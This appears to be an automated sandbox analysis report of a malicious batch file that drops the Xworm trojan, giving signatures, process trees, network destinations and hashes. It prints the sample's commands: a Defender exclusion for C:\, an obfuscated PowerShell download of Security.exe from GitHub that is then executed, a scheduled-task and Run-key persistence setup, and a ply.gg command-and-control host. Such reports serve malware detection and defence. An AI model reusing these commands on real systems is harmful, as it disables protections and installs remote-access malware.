Analysis Overview
SHA256
9123d299aaf0d551dc6a10b83ae8143586c68279af85fab5e2291993c550179c
Threat Level: Known bad
The file SexyBoy.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 18:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 18:48
Reported
2024-05-26 18:49
Platform
win10-20240404-en
Max time kernel
31s
Max time network
40s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Security.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Security = "C:\\Users\\Admin\\AppData\\Roaming\\Security.exe" | C:\Users\Admin\AppData\Local\Temp\Security.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"
C:\Windows\system32\net.exe
NET FILE
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Add-MpPreference -ExclusionPath 'C:\'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/Proxyonly/wewewewe/raw/main/S"e"cur"i"ty.exe', 'C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe')"
C:\Users\Admin\AppData\Local\Temp\Security.exe
"C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Security" /tr "C:\Users\Admin\AppData\Roaming\Security.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paris-disciplinary.gl.at.ply.gg | udp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
Files
memory/4116-0-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp
memory/4116-5-0x000001D8B1100000-0x000001D8B1122000-memory.dmp
memory/4116-7-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4116-9-0x000001D8B12B0000-0x000001D8B1326000-memory.dmp
memory/4116-10-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o05aqsrn.chy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4116-23-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4116-49-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4116-50-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/4980-57-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7b1f83ac48cbe6055096e17c831c8241 |
| SHA1 | 29bbd8eceafbf7dfaab51aeb06e62f8e79385180 |
| SHA256 | 69ae18fb29c7d6d3c7b0ac41c707509410b693d0174bb929bbe53e167e62cc77 |
| SHA512 | 84f40c1f902a9f5fa2dbbf0e612a4f452a4f3772dca5b2d98bbe09569ccbf41de6c7b06e93736f73d0b7fcaf4997b41417682a45c3b51b86d8433fb70a25ebf6 |
memory/4980-60-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4980-69-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4980-79-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Security.exe
| MD5 | 8cfcf2a8ff7ed19f56c4ba6ad32ff237 |
| SHA1 | 3bfa32a1a8f738a8390fb029c098d6db43f000ee |
| SHA256 | 55de204273cd069d114a5928de0af46b93bde9b437bd01ae10c443d48aba1276 |
| SHA512 | 46b4933efeff1075c1b629c1c00f077c9a5ffc0ba0cdd01ad393be31064c65e75982988153fe0a393c3519c3a922292efc369826e32bac9aa96a0cce7de2d2cb |
memory/3144-83-0x0000000000EC0000-0x0000000000ED6000-memory.dmp